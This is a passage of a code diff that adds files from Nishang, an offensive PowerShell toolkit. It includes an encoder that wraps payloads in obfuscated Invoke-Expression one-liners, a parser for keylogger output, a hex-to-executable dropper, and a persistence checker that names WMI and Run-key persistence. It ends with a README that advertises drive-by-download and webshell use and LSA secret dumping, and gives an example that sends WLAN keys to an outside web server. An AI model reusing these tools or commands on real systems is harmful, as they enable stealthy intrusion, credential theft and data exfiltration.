create problems, for example, a meterpreter session.
.PARAMETER DataToEncode
The path of the file to be decoded. Use with -IsString to enter a string.
.PARAMETER OutputFilePath
The path of the output file. Default is "encoded.txt" in the current working directory.
.PARAMETER OutputCommandFilePath
The path of the output file where encoded command would be written. Default is "encodedcommand.txt" in the current working directory.
.PARAMETER IsString
Use this to specify if you are passing a string ins place of a filepath.
.EXAMPLE
PS > Invoke-Encode -DataToEncode C:\files\encoded.txt -OutCommand
Use above command to generate encoded data and encoded command which could be used on powershell console.
.EXAMPLE
PS > Invoke-Encode -DataToEncode C:\files\encoded.txt
.EXAMPLE
PS > Invoke-Encode Get-Process -IsString
Use above to decode a string.
.LINK
http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
https://github.com/samratashok/nishang
#>
function Invoke-Encode
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$DataToEncode,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$OutputFilePath = ".\encoded.txt",
[Parameter(Position = 2, Mandatory = $False)]
[String]
$OutputCommandFilePath = ".\encodedcommand.txt",
[Switch]
$OutCommand,
[Switch]
$IsString
)
if($IsString -eq $true)
{
$Enc = $DataToEncode
}
else
{
$Enc = Get-Content $DataToEncode -Encoding UTF8
}
$data = [string]::Join("`n", $Enc)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($data)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
Write-Verbose $Compressed
Out-File -InputObject $Compressed -FilePath $OutputFilePath
Write-Output "Encoded data written to $OutputFilePath"
if ($OutCommand -eq $True)
{
#http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
"`$(New-Object IO.Compression.GZipStream (" +
"`$(New-Object IO.MemoryStream (,"+
"`$([Convert]::FromBase64String('$Compressed')))), " +
"[IO.Compression.CompressionMode]::Decompress)),"+
" [Text.Encoding]::ASCII)).ReadToEnd();"
Write-Verbose $command
Out-File -InputObject $command -FilePath $OutputCommandFilePath
Write-Output "Encoded command written to $OutputCommandFilePath"
}
}

197
aspx/nishang/Utility/Parse_Keys.ps1 Normal file
View file

@ -0,0 +1,197 @@
<#
.SYNOPSIS
A script which could be used to parse keys logged
by Kelogger payload of Nishang.
.DESCRIPTION
This script parses keys logged by Keylogger payload
of Nishang.
.PARAMETER RawKeys
Name of the text file which contains logged keys.
.PARAMETER LoggedKeys
Name of the text file where parsed keys will be stored
.EXAMPLE
PS > Parse_Keys raw.txt logged.txt
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Parse_Keys
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$RawKeys,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$LoggedKeys
)
[String]$data = Get-Content $RawKeys
$keys = $data.split(" ");
foreach ($i in $keys)
{
switch ($i)
{
48 {$out = $out + "0"}
49 {$out = $out + "1"}
50 {$out = $out + "2"}
51 {$out = $out + "3"}
52 {$out = $out + "4"}
53 {$out = $out + "5"}
54 {$out = $out + "6"}
55 {$out = $out + "7"}
56 {$out = $out + "8"}
57 {$out = $out + "9"}
S-48 {$out = $out + ")"}
S-49 {$out = $out + "!"}
S-50 {$out = $out + "@"}
S-51 {$out = $out + "#"}
S-52 {$out = $out + "$"}
S-53 {$out = $out + "%"}
S-54 {$out = $out + "^"}
S-55 {$out = $out + "&"}
S-56 {$out = $out + "*"}
S-57 {$out = $out + "("}
65 {$out = $out + "A"}
66 {$out = $out + "B"}
67 {$out = $out + "C"}
68 {$out = $out + "D"}
69 {$out = $out + "E"}
70 {$out = $out + "F"}
71 {$out = $out + "G"}
72 {$out = $out + "H"}
73 {$out = $out + "I"}
74 {$out = $out + "J"}
75 {$out = $out + "K"}
76 {$out = $out + "L"}
77 {$out = $out + "M"}
78 {$out = $out + "N"}
79 {$out = $out + "O"}
80 {$out = $out + "P"}
81 {$out = $out + "Q"}
82 {$out = $out + "R"}
83 {$out = $out + "S"}
84 {$out = $out + "T"}
85 {$out = $out + "U"}
86 {$out = $out + "V"}
87 {$out = $out + "W"}
88 {$out = $out + "X"}
89 {$out = $out + "Y"}
90 {$out = $out + "Z"}
S-65 {$out = $out + "a"}
S-66 {$out = $out + "b"}
S-67 {$out = $out + "c"}
S-68 {$out = $out + "d"}
S-69 {$out = $out + "e"}
S-70 {$out = $out + "f"}
S-71 {$out = $out + "g"}
S-72 {$out = $out + "h"}
S-73 {$out = $out + "i"}
S-74 {$out = $out + "j"}
S-75 {$out = $out + "k"}
S-76 {$out = $out + "l"}
S-77 {$out = $out + "m"}
S-78 {$out = $out + "n"}
S-79 {$out = $out + "o"}
S-80 {$out = $out + "p"}
S-81 {$out = $out + "q"}
S-82 {$out = $out + "r"}
S-83 {$out = $out + "s"}
S-84 {$out = $out + "t"}
S-85 {$out = $out + "u"}
S-86 {$out = $out + "v"}
S-87 {$out = $out + "w"}
S-88 {$out = $out + "x"}
S-89 {$out = $out + "y"}
S-90 {$out = $out + "z"}
96 {$out = $out + "0"}
97 {$out = $out + "1"}
98 {$out = $out + "2"}
99 {$out = $out + "3"}
100 {$out = $out + "4"}
101 {$out = $out + "5"}
102 {$out = $out + "6"}
103 {$out = $out + "7"}
104 {$out = $out + "8"}
105 {$out = $out + "9"}
186 {$out = $out + ";"}
187 {$out = $out + "="}
188 {$out = $out + ","}
189 {$out = $out + "-"}
190 {$out = $out + "."}
191 {$out = $out + "/"}
192 {$out = $out + "``"}
S-186 {$out = $out + ":"}
S-187 {$out = $out + "+"}
S-188 {$out = $out + "<"}
S-189 {$out = $out + "_ "}
S-190 {$out = $out + ">"}
S-191 {$out = $out + "?"}
S-192 {$out = $out + "~"}
#1 {$out = $out + "Left Mouse Click"}
#2 {$out = $out + "Right Mouse Click"}
#4 {$out = $out + "Third Mouse Click"}
#9 {$out = $out + "Tab"}
#164 {$out = $out + "Left Alt"}
#165 {$out = $out + "Right Alt"}
#162 {$out = $out + "Left Ctrl"}
#163 {$out = $out + "Right Ctrl"}
#33 {$out = $out + "Page Up"}
#34 {$out = $out + "Page Down"}
#35 {$out = $out + "Home"}
#36 {$out = $out + "End"}
#37 {$out = $out + "Left Arrow"}
#38 {$out = $out + "Up Arrow"}
#39 {$out = $out + "Right Arrow"}
#40 {$out = $out + "Down Arrow"}
#37 {$out = $out + "Left Arrow"}
#38 {$out = $out + "Up Arrow"}
#39 {$out = $out + "Right Arrow"}
#44 {$out = $out + "Print Screen"}
#45 {$out = $out + "Insert"}
46 {$out = $out + "Delete"}
8 {$out = $out + "Backspace"}
32 {$out = $out + " "}
13 {$out = $out + "Enter"}
#19 {$out = $out + "Pause"}
#20 {$out = $out + "Caps Lock"}
#144 {$out = $out + "Num Lock"}
#145 {$out = $out + "Scroll Lock"}
#27 {$out = $out + "Escape"}
#91 {$out = $out + "Window Key"}
#111 {$out = $out + "/"}
#106 {$out = $out + "*"}
#107 {$out = $out + "+"}
#112 {$out = $out + "F1"}
#113 {$out = $out + "F2"}
#114 {$out = $out + "F3"}
#115 {$out = $out + "F4"}
#116 {$out = $out + "F5"}
#117 {$out = $out + "F6"}
#118 {$out = $out + "F7"}
#119 {$out = $out + "F8"}
#120 {$out = $out + "F9"}
#121 {$out = $out + "F10"}
#122 {$out = $out + "F11"}
#123 {$out = $out + "F12"}
}
}
Out-File -FilePath $LoggedKeys -Append -InputObject "$out"
}

72
aspx/nishang/Utility/Remove-Persistence.ps1 Normal file
View file

@ -0,0 +1,72 @@
<#
.SYNOPSIS
Nishang script which could be used to clear the persistence added by Nishang payloads and scripts.
.DESCRIPTION
This script cleans WMI events and Registry keys added by various payloads and Add-persistence script.
Run the script as an Administrator to remove the WMI events.
.Example
PS > Remove-Persistence
Check for Persistence.
.Example
PS > Remove-Persistence -Remove
Remove the Persistence.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
#>
function Remove-Persistence
{
[CmdletBinding()] Param(
[Parameter(Position = 0)]
[Switch]
$Remove
)
if ($Remove -eq $true)
{
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true)
{
Write-Warning "Run the Command as an Administrator. Removing Registry keys only."
Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -ErrorAction SilentlyContinue
Break
}
Write-Output "Removing the WMI Events."
$filterName = "WindowsSanity"
gwmi __eventFilter -namespace root\subscription -filter "name='WindowsSanity'"| Remove-WmiObject
gwmi activeScriptEventConsumer -Namespace root\subscription | Remove-WmiObject
gwmi __filtertoconsumerbinding -Namespace root\subscription -Filter "Filter = ""__eventfilter.name='WindowsSanity'""" | Remove-WmiObject
Write-Output "Removing the Registry keys."
Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -ErrorAction SilentlyContinue
}
$Regkey = Get-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -name Update -ErrorAction SilentlyContinue
$wmi_1 = gwmi __eventFilter -namespace root\subscription -filter "name='WindowsSanity'"
$wmi_2 = gwmi activeScriptEventConsumer -Namespace root\subscription
$wmi_3 = gwmi __filtertoconsumerbinding -Namespace root\subscription -Filter "Filter = ""__eventfilter.name='WindowsSanity'"""
if ($Regkey -ne $null )
{
Write-Warning "Run Registry key persistence found. Use with -Remove option to clean."
}
elseif (($wmi_1) -and ($wmi_2) -and ($wmi_3) -ne $null)
{
Write-Warning "WMI permanent event consumer persistence found. Use with -Remove option to clean."
}
else
{
Write-Output "No Persistence found."
}
}

59
aspx/nishang/Utility/StringToBase64.ps1 Normal file
View file

@ -0,0 +1,59 @@
<#
.SYNOPSIS
Nishang script which encodes a string to base64 string.
.DESCRIPTION
This payload encodes the given string to base64 string and writes it to base64encoded.txt in current directory.
.PARAMETER Str
The string to be encoded
.PARAMETER OutputFile
The path of the output file. Default is "encoded.txt" in the current working directory.
.PARAMETER IsString
Use this to specify if you are passing a string ins place of a filepath.
.EXAMPLE
PS > StringToBase64 "start-process calc.exe" -IsString
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function StringtoBase64
{
[CmdletBinding()]
Param( [Parameter(Position = 0, Mandatory = $False)]
[String]
$Str,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$outputfile=".\base64encoded.txt",
[Switch]
$IsString
)
if($IsString -eq $true)
{
$utfbytes = [System.Text.Encoding]::Unicode.GetBytes($Str)
}
else
{
$utfbytes = [System.Text.Encoding]::Unicode.GetBytes((Get-Content $Str))
}
$base64string = [System.Convert]::ToBase64String($utfbytes)
Out-File -InputObject $base64string -Encoding ascii -FilePath "$outputfile"
Write-Output "Encoded data written to file $outputfile"
}

41
aspx/nishang/Utility/TexttoExe.ps1 Normal file
View file

@ -0,0 +1,41 @@
<#
.SYNOPSIS
Nishang script to convert a PE file in hex format to executable
.DESCRIPTION
This script converts a PE file in hex to executable and writes it to user temp.
.PARAMETER Filename
Path of the hex text file from which executable will be created.
.PARAMETER EXE
Path where the executable should be created.
.EXAMPLE
PS > TexttoExe C:\evil.text C:\exe\evil.exe
.LINK
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
https://github.com/samratashok/nishang
#>
function TexttoEXE
{
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$FileName,
[Parameter(Position = 1, Mandatory = $True)]
[String]$EXE
)
[String]$hexdump = get-content -path "$Filename"
[Byte[]] $temp = $hexdump -split ' '
[System.IO.File]::WriteAllBytes($EXE, $temp)
Write-Output "Executable written to file $EXE"
}

14
aspx/nishang/nishang.psm1 Normal file
View file

@ -0,0 +1,14 @@

<#
Import this module to use all the scripts in nishang, except Keylogger in current powershell session. The module must reside in the nishang folder.
PS > Import-Module .\nishang.psm1
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
https://github.com/samratashok/nishang
#>
#Code stolen from here https://github.com/mattifestation/PowerSploit
Get-ChildItem -Recurse (Join-Path $PSScriptRoot *.ps1) | ForEach-Object { if ($_.Name -ne "Keylogger.ps1") {. $_.FullName}}

3884
aspx/nishang/powerpreter/Powerpreter.psm1 Normal file
View file

File diff suppressed because it is too large Load diff

33
aspx/nishang/powerpreter/README.md Normal file
View file

@ -0,0 +1,33 @@
#####Powerpreter is a script module which makes it useful in scenarios like drive-by-download, document attachments, webshells etc. where one may like to pull all the functionality in Nishang in a single file or where deployment is not easy to do. Powerpreter has persistence capabilities too. See examples for help in using it.
#####Examples
.EXAMPLE
PS > Import-Module .\Powerpreter.psm1
PS> Get-Command -Module powerpreter
The first command imports the module in current powershell session.
The second command lists all the functions available with powerpreter.
.EXAMPLE
PS > Import-Module .\Powerpreter.psm1; Enable-DuplicateToken; Get-LSASecret
Use above command to import powerpreter in current powershell session and execute the two functions.
.EXAMPLE
PS > Import-Module .\Powerpreter.psm1; Persistence
Use above for reboot persistence
.EXAMPLE
PS > Import-Module .\Powerpreter.psm1
PS > Get-WLAN-Keys | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above for exfiltration to a webserver which logs POST requests.